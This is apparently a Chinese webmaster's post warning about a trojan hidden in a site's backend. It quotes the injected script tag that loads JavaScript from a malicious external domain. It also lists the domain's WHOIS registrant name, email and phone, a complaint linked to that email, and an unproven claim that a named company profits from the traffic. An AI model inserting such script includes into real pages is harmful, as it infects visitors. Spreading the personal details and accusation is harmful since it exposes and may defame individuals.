大家注意这一个挂马的
有一个站被挂马很长时间了,前台页面的马被清掉,但后台的马一直找不到,实在不舒服,准备将这个站自杀掉,但又不甘心,决定再找一次。
花了四个多小时,终于找到了,现贴出来提醒大家注意,大家一定不要点马所在的网址,除非你安装了杀毒软件,光一个360是不行的。
先看这一段代码:
<html xmlns="http://www.w3.org/1999/xhtml">
<script language='JavaScript' type='text/JavaScript' src='http://www.w3og.cn/org'></script>
<head>
注意其中的'http://www.w3og.cn/org',这是木马网页地址。很有欺骗性,我找过很多次都没注意到。服务器好象是四川乐山电信的,我几乎要拿我自己的服务器与之同归于尽。
再强调一下,贴出来不是要害你啊,不要乱点。
Domain Name: w3og.cn
ROID: 20080213s10001s70391079-cn
Domain Status: ok
Registrant Organization: 陈强
Registrant Name: 陈强
Administrative Email: zhuya22@126.com
Sponsoring Registrar: 北京新网数码信息技术有限公司
Name Server:ns2.xinnet.cn
Name Server:ns2.xinnetdns.com
Registration Date: 2008-02-13 17:16
Expiration Date: 2011-02-13 17:16
http://www.zjedu.gov.cn/TzemailA ... 277010f71e2c65c0027
电子邮件: zhuya22@126.com
联系电话: 0577658796549
联系地址: 电风扇士大夫
提交时间: 2006-12-11
主题: 这样的设施也能办大学???
建议内容: 温职院INTERNET网硬件设施太差 每栋宿舍楼网速一直以来比拨号
上网还慢 ,根本不能满足大学生对TNTER网的需求
交了30元/月的网费却只能上垃圾网络,收了我们的血汗钱却不干人事,气人兮
气人,
学校机房既小又差,还1。5元/小时,我靠 这也叫大学吗??我们学剩
上网只能跑正上的网吧,远又网费又贵,很多同学为了省钱只能玩通宵
温职院的网络设施根本不行,不知道评估团怎么办事的
可笑的是学校还想评全国十大优秀高职 丢死人了
另一个受害者的文章http://www.176v.com/shtml/19/19-481070.html
请注意这个公司长沙智之星软件有限公司www.zzstar.cn,这个木马一直为这个站带流量,如果是被陷害的,那还情有可原
>> 相关资讯:
上一篇文章:主流搜索引擎与DMOZ目录相关度探秘 下一篇文章:以前的失败不算什么 决定从头来过最新五条评论
查看全部评论
您的评论
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为
内容搜索
最新更新文章
本类推荐文章



